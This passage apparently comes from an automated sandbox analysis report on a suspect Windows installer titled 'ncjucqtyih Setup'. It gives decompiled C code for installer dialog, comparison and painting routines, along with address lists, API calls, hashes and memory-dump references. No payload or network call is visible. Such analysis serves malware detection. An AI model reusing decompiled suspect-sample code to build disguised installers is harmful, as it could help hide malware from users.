							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                        0x10005ea5
                        0x10005ea5
                        0x10005ea5
                        0x10005eab
                        0x10005f32
                        0x10005f34
                        0x10005f36
                        0x100062b5
                        0x100062b5
                        0x100070a6
                        0x100070a6
                        0x10005f3c
                        0x10005f42
                        0x10005fc9
                        0x10005fcb
                        0x10005fcd
                        0x00000000
                        0x00000000
                        0x10005fd3
                        0x10005fd9
                        0x10006060
                        0x10006062
                        0x10006064
                        0x00000000
                        0x00000000
                        0x1000606a
                        0x10006070
                        0x100060f7
                        0x100060f9
                        0x100060fb
                        0x00000000
                        0x00000000
                        0x10006107
                        0x1000618f
                        0x10006191
                        0x10006193
                        0x00000000
                        0x00000000
                        0x10006199
                        0x1000619f
                        0x10006226
                        0x10006228
                        0x1000622a
                        0x00000000
                        0x00000000
                        0x10006230
                        0x10006236
                        0x100062ad
                        0x100062af
                        0x100062b1
                        0x100062b3
                        0x100062b3
                        0x00000000
                        0x100062b1
                        0x1000623f
                        0x10006241
                        0x10006255
                        0x1000625d
                        0x1000625f
                        0x10006273
                        0x1000627b
                        0x1000627d
                        0x10006291
                        0x10006299
                        0x1000629b
                        0x100062a4
                        0x100062a4
                        0x00000000
                        0x1000629b
                        0x10006286
                        0x1000628f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000628f
                        0x10006268
                        0x10006271
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006271
                        0x1000624a
                        0x10006253
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006253
                        0x100061ac
                        0x100061ae
                        0x100061c6
                        0x100061ce
                        0x100061d0
                        0x100061e8
                        0x100061f0
                        0x100061f2
                        0x1000620a
                        0x10006212
                        0x10006214
                        0x1000621d
                        0x1000621d
                        0x00000000
                        0x10006214
                        0x100061fb
                        0x10006204
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006204
                        0x100061d9
                        0x100061e2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100061e2
                        0x100061b7
                        0x100061c0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100061c0
                        0x10006115
                        0x10006117
                        0x1000612f
                        0x10006137
                        0x10006139
                        0x10006151
                        0x10006159
                        0x1000615b
                        0x10006173
                        0x1000617b
                        0x1000617d
                        0x10006186
                        0x10006186
                        0x00000000
                        0x1000617d
                        0x10006164
                        0x1000616d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000616d
                        0x10006142
                        0x1000614b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000614b
                        0x10006120
                        0x10006129
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006129
                        0x1000607d
                        0x1000607f
                        0x10006097
                        0x1000609f
                        0x100060a1
                        0x100060b9
                        0x100060c1
                        0x100060c3
                        0x100060db
                        0x100060e3
                        0x100060e5
                        0x100060ee
                        0x100060ee
                        0x00000000
                        0x100060e5
                        0x100060cc
                        0x100060d5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100060d5
                        0x100060aa
                        0x100060b3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100060b3
                        0x10006088
                        0x10006091
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006091
                        0x10005fe6
                        0x10005fe8
                        0x10006000
                        0x10006008
                        0x1000600a
                        0x10006022
                        0x1000602a
                        0x1000602c
                        0x10006044
                        0x1000604c
                        0x1000604e
                        0x10006057
                        0x10006057
                        0x00000000
                        0x1000604e
                        0x10006035
                        0x1000603e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000603e
                        0x10006013
                        0x1000601c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000601c
                        0x10005ff1
                        0x10005ffa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10005ffa
                        0x10005f4f
                        0x10005f51
                        0x10005f69
                        0x10005f71
                        0x10005f73
                        0x10005f8b
                        0x10005f93
                        0x10005f95
                        0x10005fad
                        0x10005fb5
                        0x10005fb7
                        0x10005fc0
                        0x10005fc0
                        0x00000000
                        0x10005fb7
                        0x10005f9e
                        0x10005fa7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10005fa7
                        0x10005f7c
                        0x10005f85
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10005f85
                        0x10005f5a
                        0x10005f63
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10005f63
                        0x10005eb8
                        0x10005eba
                        0x10005ed2
                        0x10005eda
                        0x10005edc
                        0x10005ef4
                        0x10005efc
                        0x10005efe
                        0x10005f16
                        0x10005f1e
                        0x10005f20
                        0x10005f29
                        0x10005f29
                        0x00000000
                        0x10005f20
                        0x10005f07
                        0x10005f10
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10005f10
                        0x10005ee5
                        0x10005eee
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10005eee
                        0x10005ec3
                        0x10005ecc
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction ID: f37e42eeb5402f7c6449bca691c0e58474bf824e6ab10249124d34993b56c141
                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction Fuzzy Hash: 3EC1703220559309EB4DCA79883413FBBE2EB966F132B176DD4B2CF5C9EF24D5249620
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001A9FA, Relevance: .2, Instructions: 221COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94aec99ad5eae9a6a09d3e856a216ee3b0a5d56d8bfc1a335e13783f319fada7
                        • Instruction ID: 5b8965b52288aa077cbfbf746e718921e26adee20f5a7e9d77f51aa1bc08ec69
                        • Opcode Fuzzy Hash: 94aec99ad5eae9a6a09d3e856a216ee3b0a5d56d8bfc1a335e13783f319fada7
                        • Instruction Fuzzy Hash: 62A1045485D2ECADDF06CBE945617FCBFB45D2A102F0841CAE4E5E6243C13A938EDB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001AA09, Relevance: .2, Instructions: 213COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 69d9cf412919657dda6be1869fd303ded9932ac3a350c0dfc9dc28806d5c9d56
                        • Instruction ID: 06c3e60a2c17e9281258dcda0207fb87e2808fd5b522f896a58ac18c76d2c87a
                        • Opcode Fuzzy Hash: 69d9cf412919657dda6be1869fd303ded9932ac3a350c0dfc9dc28806d5c9d56
                        • Instruction Fuzzy Hash: ADA1035485D2EDADCF46CBE945617FCBFB05D2A102F0841CAE4E5E6283C13A938EDB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001A616, Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                        • Instruction ID: a5f5cc404345051d9a3d43732892c5c43a2385a91314192d1658d7f645f45817
                        • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                        • Instruction Fuzzy Hash: 0111C272A10209AFCB10DBAAD8888AEF7FDEF466D4B5540A5F804DB214E774DEC0C660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001A706, Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                        • Instruction ID: f4d788da18cf8e267c38a3c1811d86f470bc5a631a0a0da5908c50b93dabbf40
                        • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                        • Instruction Fuzzy Hash: FAE092357645049FCB44CBA8CC41D55B3F4EB09230B114290FC15CB3E0EA34FE80D650
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001A744, Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                        • Instruction ID: 2df1a6d1e3cca68c9d16f3148c796fc1ccc26e8a365bcac769081ee74b5b76f8
                        • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                        • Instruction Fuzzy Hash: 47E08C3A7146508BC360DB59C980942F3F9FB8A2F072A486AEC89DB751C230FD808A90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001A6C7, Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x578476
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x5768fc
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x571700
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                        0x00403fac
                        0x004040d2
                        0x0040412e
                        0x00404132
                        0x00404209
                        0x0040420b
                        0x0040420b
                        0x00404211
                        0x00404211
                        0x00404214
                        0x00000000
                        0x0040421b
                        0x00404140
                        0x00404142
                        0x0040414c
                        0x00404157
                        0x0040415a
                        0x0040415d
                        0x00404168
                        0x0040416b
                        0x00404172
                        0x00404180
                        0x00404198
                        0x004041a0
                        0x004041ab
                        0x004041bb
                        0x004041bd
                        0x004041bd
                        0x00404172
                        0x004041c7
                        0x00000000
                        0x004041d2
                        0x004041d6
                        0x004041e7
                        0x004041e7
                        0x004041ed
                        0x004041fb
                        0x004041fb
                        0x00000000
                        0x004041ff
                        0x004041c7
                        0x004040dd
                        0x00000000
                        0x004040f1
                        0x004040f7
                        0x004040fd
                        0x00000000
                        0x00000000
                        0x00404122
                        0x00404124
                        0x00404129
                        0x00000000
                        0x00404129
                        0x004040dd
                        0x00403fb2
                        0x00403fb5
                        0x00403fba
                        0x00403fbc
                        0x00403fcb
                        0x00403fcb
                        0x00403fcd
                        0x00403fd2
                        0x00403fd5
                        0x00403fd7
                        0x00403fdc
                        0x00403fe5
                        0x00403feb
                        0x00403ff7
                        0x00403ffa
                        0x00404003
                        0x00404008
                        0x0040400b
                        0x00404010
                        0x00404027
                        0x0040402e
                        0x00404041
                        0x00404044
                        0x00404059
                        0x0040405b
                        0x00404060
                        0x00404065
                        0x0040406a
                        0x0040406a
                        0x00404079
                        0x00404088
                        0x0040408a
                        0x004040a0
                        0x004040af
                        0x004040b1
                        0x00000000

                        APIs
                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404027
                        • GetDlgItem.USER32 ref: 0040403B
                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404059
                        • GetSysColor.USER32(?), ref: 0040406A
                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404079
                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404088
                        • lstrlenA.KERNEL32(?), ref: 00404092
                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040A0
                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040AF
                        • GetDlgItem.USER32 ref: 00404112
                        • SendMessageA.USER32(00000000), ref: 00404115
                        • GetDlgItem.USER32 ref: 00404140
                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404180
                        • LoadCursorA.USER32 ref: 0040418F
                        • SetCursor.USER32(00000000), ref: 00404198
                        • ShellExecuteA.SHELL32(0000070B,open,.B,00000000,00000000,00000001), ref: 004041AB
                        • LoadCursorA.USER32 ref: 004041B8
                        • SetCursor.USER32(00000000), ref: 004041BB
                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041E7
                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                        • String ID: N$open$.B
                        • API String ID: 3615053054-720656042
                        • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                        • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                        • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                        • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10003510, Relevance: 33.3, APIs: 22, Instructions: 280fileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$ErrorLast$View$CloseCreateHandleMappingSize$PointerUnmap
                        • String ID:
                        • API String ID: 2750380209-0
                        • Opcode ID: b1afd5b231849d870f27c837b5d5c5bcf57f0f9d43715ea1d8f842c0bd16ba3b
                        • Instruction ID: a62a893cf8ecd11a2c54ae0cde99abb28603290453e125d2d574c9a25d11d189
                        • Opcode Fuzzy Hash: b1afd5b231849d870f27c837b5d5c5bcf57f0f9d43715ea1d8f842c0bd16ba3b
                        • Instruction Fuzzy Hash: A5E17EB49087858FE760DF28C58875BBBE4FB88354F108A2EE89987394DB759548CF43
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x571700
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "ncjucqtyih Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0x4025e
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                        0x0040100a
                        0x00401039
                        0x00401047
                        0x0040104d
                        0x00401051
                        0x0040105b
                        0x00401061
                        0x00401064
                        0x004010f3
                        0x00401089
                        0x0040108c
                        0x004010a6
                        0x004010bd
                        0x004010cc
                        0x004010cf
                        0x004010d5
                        0x004010d9
                        0x004010e4
                        0x004010ed
                        0x004010ef
                        0x004010ef
                        0x00401100
                        0x00401105
                        0x0040110d
                        0x00401110
                        0x00401112
                        0x00401118
                        0x0040111f
                        0x00401126
                        0x00401130
                        0x00401142
                        0x00401156
                        0x00401160
                        0x00401165
                        0x00401165
                        0x00401110
                        0x0040116e
                        0x00000000
                        0x00401178
                        0x00401010
                        0x00401013
                        0x00401015
                        0x00401019
                        0x0040101f
                        0x0040101f
                        0x00000000

                        APIs
                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextA.USER32(00000000,ncjucqtyih Setup,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F$ncjucqtyih Setup
                        • API String ID: 941294808-2896005540
                        • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                        • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                        • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                        • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
